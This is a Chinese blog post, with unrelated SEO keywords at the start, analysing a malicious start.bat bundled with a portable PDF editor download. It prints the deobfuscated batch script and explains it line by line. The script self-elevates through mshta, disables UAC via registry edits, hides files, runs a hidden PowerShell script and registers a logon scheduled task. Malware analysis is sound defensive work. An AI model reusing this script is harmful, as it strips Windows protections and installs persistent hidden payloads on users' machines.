商洛免费做网站公司,emlog转换wordpress,微信推广费用一般多少,域名注册和网站设计服务在第一次下载软件时#xff0c;目录中配了一个使用说明#xff0c;说是需要通过start.bat 这个文件来启动程序#xff0c;而这个 start.bat 就是始作俑者#xff1a; 病毒作者比较狡猾#xff0c;其中start.bat 用记事本打开是乱码#xff0c;但是可以通过将这个批处理…在第一次下载软件时目录中配了一个使用说明说是需要通过start.bat 这个文件来启动程序而这个 start.bat 就是始作俑者 病毒作者比较狡猾其中start.bat 用记事本打开是乱码但是可以通过将这个批处理文件的扩展名改为.doc然后双击就用word打开了因为这个批处理加密是利用混淆编码的原理加密的而word能识别很多编码所以用word打开就可以看到真容了打开文件完整的的病毒启动内容脚本如下 echo offPUSHD %~DP0 cd /d %~dp0 %1 %2mshta vbscript:createobject(shell.application).shellexecute(%~s0,goto :target,,runas,1)(window.close)goto :eof :targetreg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F nul 2nul reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F nul 2nul reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F nul 2nulcd /d bin attrib s h PDFeditorPortable.execd /d re\libstart powershell -windowstyle hidden .\add.ps1 nul 2nulfor /f %%i in (dir/s/b/a-d^|find /c /v .*) do set f%%iif %f% equ 5 (cd ..cd ..start PDFeditorPortable.execd re\libSchTasks /Create /SC ONLOGON /delay 0005:00 /TN CrashReporting /TR %CD%\CrashReporting.bat /f nul 2nul) else (echoecho 运行过程被杀软干扰可通过以下方法恢复echoecho 1、检查是否被杀毒软件隔离如被隔离请恢复并添加进信任区后再运行软件echoecho 2、方法1如果不行请关闭杀软重新解压原本压缩文件再运行软件echopause )setlocal enabledelayedexpansion set line0 for /f %%a in (wmic cpu get NumberOfLogicalProcessors) do ( set /a line1 if !line!2 set A%%a )set /a B %A% / 2set fnCrashReporting2.bat nul 2nul (for /f tokens* %%i in (%fn%) do ( set s%%i set s!s:20%B%! echo !s!))temp1126.txt move /y temp1126.txt %fn% nul 2nulcall CrashReporting2.batexit 这段代码是一个 Windows 批处理脚本主要用于修改系统注册表设置、启动程序并处理一些与安全相关的配置。以下是对代码的逐行解释 代码解析 echo off: 关闭命令行窗口中的命令回显使得执行时不显示每个命令的内容。 PUSHD %~DP0 cd /d %~dp0: PUSHD %~DP0将当前目录更改为脚本所在的目录。cd /d %~dp0确保切换到该目录。 %1 %2: 执行传递给脚本的第一个和第二个参数。 mshta vbscript:createobject(shell.application).shellexecute(%~s0,goto :target,,runas,1)(window.close)goto :eof: 使用 mshta 运行 VBScript以管理员权限重新执行当前脚本并跳转到 :target 标签。window.close 在执行后关闭窗口。goto :eof 确保脚本在此处结束不继续执行后面的代码。 :target: 标签后面的代码将在跳转到此标签时执行。 修改注册表: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F nul 2nul: 将管理员的用户帐户控制 (UAC) 提示行为设置为 0关闭提示。 reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F nul 2nul: 禁用用户帐户控制 (UAC)。 reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F nul 2nul: 关闭安全桌面上的提示。 cd /d bin: 切换到 bin 目录。 attrib s h PDFeditorPortable.exe: 将 PDFeditorPortable.exe 文件设置为系统文件和隐藏文件。 cd /d re\lib: 切换到 re\lib 目录。 start powershell -windowstyle hidden .\add.ps1 nul 2nul: 在隐藏窗口中启动一个 PowerShell 脚本 add.ps1并将输出重定向到空设备。 for /f %%i in (dir/s/b/a-d^|find /c /v .*) do set f%%i: 计算当前目录及子目录下的文件数量并将结果存储在变量 f 中。 条件判断: if %f% equ 5 (...) else (...): 如果文件数量等于 5则执行括号内的命令否则执行 else 部分。如果文件数量为 5切换到上级目录启动 PDFeditorPortable.exe并创建一个名为 CrashReporting 的计划任务。如果文件数量不为 5输出提示信息建议用户检查杀毒软件的干扰。 获取逻辑处理器数量: 通过 wmic cpu get NumberOfLogicalProcessors 获取逻辑处理器数量并将其存储在变量 A 中。计算 B 为 A 的一半。 更新 CrashReporting2.bat 文件: 将 CrashReporting2.bat 文件中的某些内容替换为计算得到的 B 值并将结果输出到临时文件 temp1126.txt 中最后移动回原文件。 调用 CrashReporting2.bat: 执行 CrashReporting2.bat 文件。 exit: 结束批处理脚本的执行。 总结 这个批处理脚本的主要功能是 修改系统的 UAC 设置以降低安全性。启动和配置某个 PDF 编辑器。处理文件数量检查确保程序正常运行。更新并执行一个名为 CrashReporting2.bat 的脚本。 由于涉及到 UAC 设置的修改这段代码可能会被安全软件标记为潜在的恶意行为。关于病毒具体执行了什么可以参见这篇博文https://mp.csdn.net/mp_blog/creation/success/142697281